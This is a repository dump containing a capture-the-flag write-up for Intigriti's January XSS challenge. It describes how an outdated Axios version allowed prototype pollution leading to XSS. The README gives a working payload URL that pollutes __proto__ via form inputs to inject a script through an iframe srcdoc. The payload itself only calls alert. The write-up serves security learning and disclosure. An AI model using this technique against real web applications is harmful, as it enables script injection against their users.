├── images ├── step-1.png ├── step-2.png ├── step-3.png ├── step-4.png ├── step-5.png └── step-6.png └── README.md /images/step-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/arturssmirnovs/challenge-0124.intigriti.io-january-xss-challenge/main/images/step-1.png -------------------------------------------------------------------------------- /images/step-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/arturssmirnovs/challenge-0124.intigriti.io-january-xss-challenge/main/images/step-2.png -------------------------------------------------------------------------------- /images/step-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/arturssmirnovs/challenge-0124.intigriti.io-january-xss-challenge/main/images/step-3.png -------------------------------------------------------------------------------- /images/step-4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/arturssmirnovs/challenge-0124.intigriti.io-january-xss-challenge/main/images/step-4.png -------------------------------------------------------------------------------- /images/step-5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/arturssmirnovs/challenge-0124.intigriti.io-january-xss-challenge/main/images/step-5.png -------------------------------------------------------------------------------- /images/step-6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/arturssmirnovs/challenge-0124.intigriti.io-january-xss-challenge/main/images/step-6.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Prototype Pollution Leading to XSS Exploitation: Intigriti's January Challenge 2 | 3 | ## Overview 4 | 5 | Intigriti's January XSS challenge presented an interesting case involving prototype pollution leading to XSS exploitation. The following steps detail the discovery, analysis, and exploitation of the vulnerability in the provided web application. 6 | 7 | ### Step 1: Initial Inspection 8 | 9 | Upon initial inspection, it was observed that certain parameters, particularly the `name` parameter, were susceptible to XSS attacks. Attempts to inject HTML code into the `name` parameter revealed that the HTML was rendered on the page. However, further scrutiny revealed that the server had implemented sensitization measures, preventing direct XSS exploitation through the `name` parameter. 10 | 11 | Step One 12 | 13 | ### Step 2: Checking Packages 14 | 15 | Analysis of the `package.json` file indicated recent updates to the packages used in the application. Despite this, upon inspecting the source code, it was identified that the Axios and jQuery libraries were loaded from external JavaScript files. 16 | 17 | Step Two 18 | 19 | ### Step 3: Outdated Package 20 | 21 | Further investigation revealed that the Axios package had undergone recent updates. Given that the `$("search")` form element, passed to Axios, was susceptible to prototype pollution, an attempt to exploit this vulnerability was initiated. A comparison of the source code between the application's Axios version and the latest Axios version exposed differences directly related to prototype pollution. 22 | 23 |
24 | Step Three 25 |
26 | 27 |
28 | Step Four 29 |
30 | 31 |
32 | Step Five 33 |
34 | 35 | ### Step 4: Crafting Payload 36 | 37 | By injecting a `
` with the id "search," it was observed that Axios was sending form data to the server. Prototype pollution was exploited by injecting a malicious payload into the form data. Initially, the payload manipulation was constrained to cases where the server returned an empty array due to no results. However, a closer examination revealed that manipulation of the payload values, undergoing jQuery sanitization, allowed the injection of XSS using the `srcdoc` attribute of an iframe element. 38 | 39 | **Final Payload on `name` Parameter:** 40 | 41 | ```html 42 | 43 | 44 | 45 | 46 | 47 |
48 | ``` 49 | 50 | https://challenge-0124.intigriti.io/challenge?name=%3Cform%20id=%22search%22%3E%3Cinput%20name=%22__proto__.[srcdoc]%22%20value=%22%3Cscript%3Ealert(parent.window.location.origin)%3C/script%3E%22%3E%3Cinput%20name=%22__proto__.[srcdoc]%22%20value=%22%22%3E%3Cinput%20name=%22__proto__.homepage%22%20value=%22https://example.com%22%3E%3Cinput%20name=%22__proto__.owner.avatar_url%22%20value=%22true%22%3E%3C/form%3E&search=binaryjs 51 | 52 | ### Step 5: XSS Exploitation 53 | 54 | The crafted payload successfully exploited the XSS vulnerability, triggering the execution of a script and demonstrating the impact of prototype pollution on the application. 55 | 56 | Step Six 57 | 58 | This comprehensive analysis showcases the identification and exploitation of prototype pollution leading to XSS, emphasizing the significance of keeping packages up-to-date and addressing vulnerabilities in web applications. 59 | 60 | #### References 61 | 62 | * https://challenge-0124.intigriti.io/ 63 | * https://challenge-0124.intigriti.io/challenge 64 | * https://github.com/axios/axios/releases/tag/v1.6.4 65 | * https://github.com/axios/axios/commit/3c0c11cade045c4412c242b5727308cff9897a0e 66 | --------------------------------------------------------------------------------